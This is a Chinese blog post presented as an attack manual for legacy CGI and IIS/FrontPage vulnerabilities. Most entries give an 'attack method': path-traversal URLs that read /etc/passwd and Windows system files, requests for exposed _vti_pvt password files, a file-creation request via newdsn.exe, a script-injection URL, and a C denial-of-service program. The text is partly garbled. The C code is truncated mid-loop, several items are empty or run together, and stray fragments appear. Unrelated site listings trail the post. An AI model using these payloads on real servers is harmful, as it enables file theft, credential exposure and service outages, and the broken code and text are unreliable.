- 浏览: 16350 次
最新评论
TWWWSCAN漏洞扫描器CGI漏洞攻击手册
2011年07月13日
1.carbo.dll
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:
提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
查看win.ini文件: c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
____________________________________________________________________________________
2.uploader.exe
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
____________________________________________________________________________________
3.search97.vts
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
____________________________________________________________________________________
4.newdsn.exe
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:
- 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。
- 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS会产生保护性错误。
____________________________________________________________________________________
5.getdrvs.exe
____________________________________________________________________________________
6. _vti_inf.html
____________________________________________________________________________________
7. service.pwd http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.
攻击方法:
访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。
____________________________________________________________________________________
8.users.pwd
UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/users.pwd。
____________________________________________________________________________________
9.authors.pwd
UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/authors.pwd。
____________________________________________________________________________________
10.administrators.pwd
UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
攻击方法:
访问http://www.hostname.com/_vti_pvt/administrators.pwd。
____________________________________________________________________________________
11.shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. Hostile Code Here">http://TrustedServer如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法:
1. 暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
2. 可信任站点执行脚本:使用如下格式的URL: http://iis5server/_vti_bin/shtml.dll/alert('document.domain='+document.domain)
3. D.o.s攻击:使用下面的程序可以能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。
#include
#include
#include
#include
#include
void Dos(void *chara);
void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc ...\n");
for (lDo = 0 ;lDo ..)的攻击,这是由于在WINDOW中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允许远程攻击者绕过WEB安全系统横贯到其他目录。
攻击方法:
假如CONFIG.SYS存在在根目录下,就能读文件。 http://example.com/...................../config.sys
列出根目录。 http://example.com/../../../../../../
____________________________________________________________________________________
15.advsearch.asp
____________________________________________________________________________________
16. autoexec.bat
现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.
攻击方法: http://127.0.0.1:8080/../../../autoexec.bat 这样将读取系统中的autoexec.bat文件
这个漏洞的利用还取决于系统目录的结构而定.
____________________________________________________________________________________
17.achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr
IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:\winnt\system32\inetsrv\iisadmpwd
攻击方法:
访问:http://example.com/iisadmpwd/*.htr的页面,并利用工具对其进行穷举。
____________________________________________________________________________________
18.visadmin.exe
这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。
使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)
攻击方法:
提交以下请求: http://www.targets.com/cgi-bin/visadmin.exe?user=guest
____________________________________________________________________________________
19.no-such-file.pl
这个漏洞会暴露其服务器上的路径,当你访问这个页面时会显示类似以下信息:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
Directory
从此我们可以知道这个页面的物理路径为C:\InetPub\scripts\no-such-file.pl
攻击方法:
访问http://www.targets.com/cgi-bin/scripts/no-such-file.pl
发表评论
-
评论 (
2012-01-20 11:16 586评论 ( 2011年12月01日 滑雪 ... -
2012届高考英语语法专题复习单项选择详解试题
2012-01-20 11:15 6952012届高考英语语法专题 ... -
2012年管理咨询师考试实务模拟试题2
2012-01-20 11:15 7202012年管理咨询师考试实务模拟试题2 17小时前 管理 ... -
部分经济学术语英文简写
2012-01-20 11:15 1588部分经济学术语英文简写 21小时前 a/c, A/C a ... -
高二地理月测试卷
2012-01-20 11:14 616高二地理月测试卷 20小时前 出题人: 班级 ... -
Linux设备模型---总线、设备、驱动、设备类的相关操作
2012-01-19 16:04 845Linux设备模型---总线、设备、驱动、设备类的相关操作 ... -
Actionscript3 文件上传组件制作
2012-01-19 16:04 952Actionscript3 文件上传组件制作 31分钟前 ... -
常见汇编编译错误中英文对照
2012-01-19 16:04 2077常见汇编编译错误中英文对照 1小时前 FATAL 严重 ... -
Linux input子系统分析【转】
2012-01-19 16:04 956Linux input子系统分析【 ... -
Intel8042芯片驱动分析
2012-01-19 16:04 1090Intel8042芯片驱动分析 20 ... -
31种方法让你变聪明
2012-01-17 05:56 44431种方法让你变聪明 201 ... -
什么啊.0.000
2012-01-17 05:56 598什么啊.0.000 2011年03月20日 ... -
无法使用千千静听的日子,太不爽了……哪个TMD的在千千网页里放了木马
2012-01-17 05:56 719无法使用千千静听的日子,太不爽了……哪个TMD的在千千网页里放 ... -
contentEditable和document.designMode的区别
2012-01-17 05:55 843contentEditable和document.design ... -
夏商与西周》第四十二章之昭王伐楚(二)
2012-01-16 04:42 529夏商与西周》第四十二章之昭王伐楚(二) 2012年01月08 ... -
稼领日志贫巳邢蔗
2012-01-16 04:42 608稼领日志贫巳邢蔗 2012 ... -
龄欣哔日志蹈诒刺陕疥赤
2012-01-16 04:42 540龄欣哔日志蹈诒刺陕疥赤 2012年01月09日 ... -
古玩辨伪之青铜器
2012-01-16 04:42 548古玩辨伪之青铜器 2012年01月09日 ... -
日本法定假日简介
2012-01-16 04:42 392日本法定假日简介 2012 ...
相关推荐
pre_o_1csdn63m9a1bs0e1rr51niuu33e.a
matlab建立计算力学课程的笔记和文件.zip
FT_Prog_v3.12.38.643--FTD USB 工作模式设定及eprom读写
matlab基于RRT和人工势场法混合算法的路径规划.zip
matlab基于matlab的两步定位软件定义接收机的开源GNSS直接位置估计插件模块.zip
office 2016三和一精简版
文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
麦肯锡咨询顾问必备宝典-时间管理.ppt
文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
麦肯锡顾问的黄金思考方法.pptx
91fdd461elb59a4ce8dfcfc46bc283a7.msi
ansys maxwell
5-5
xx广告促销计划流程实施手册.ppt
仿小米商城微信小程序源码+项目说明.zip
文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
麦肯锡xx客户满意服务.ppt
网课专注度监测预警系统基于yolov5目标检测的网课专注度检测系统源码+模型+pyqt5界面.zip
【作品名称】:基于python+Scrapy的农业数据爬虫设计与实现 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 基于Scrapy的农业数据爬虫设计与实现 . ├── Crops # web服务 │ ├── app.py │ ├── static # 静态文件 │ │ ├── css │ │ └── js │ └── templates # 静态页面 │ ├── corn.html │ ├── corns.html │ ├── index.html │ ├── porcor.html │ ├── pork.html │ └── porks.html ├── README.md └── spider # 爬虫及数据处理 ├── integration # 数据汇总 │ └── corn.py └── tutorial # 爬虫 ├── scrap